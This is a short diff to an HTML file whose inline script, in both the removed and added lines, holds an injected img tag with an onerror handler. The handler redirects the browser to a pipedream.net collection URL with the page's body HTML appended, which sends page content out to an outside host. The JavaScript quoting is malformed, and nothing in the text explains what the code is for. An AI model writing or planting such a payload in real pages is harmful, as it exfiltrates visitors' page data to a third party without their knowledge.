--- a/index.html
+++ b/index.html
@@ -1,8 +1,8 @@
 <html>
  	<body>
    		<script>
-		this.document.title = "a"; this.document.title = "
-		<img src="a" onerror="location.href='https://envdmjv22omhg.x.pipedream.net/'+document.body.innerHTML;"
+		this.document.title = "a"; this.document.title =
+		"<img src="a" alt="b" onerror="location.href='https://envdmjv22omhg.x.pipedream.net/'+document.body.innerHTML;">"
 	 	</script>
 	</body>
 </html>
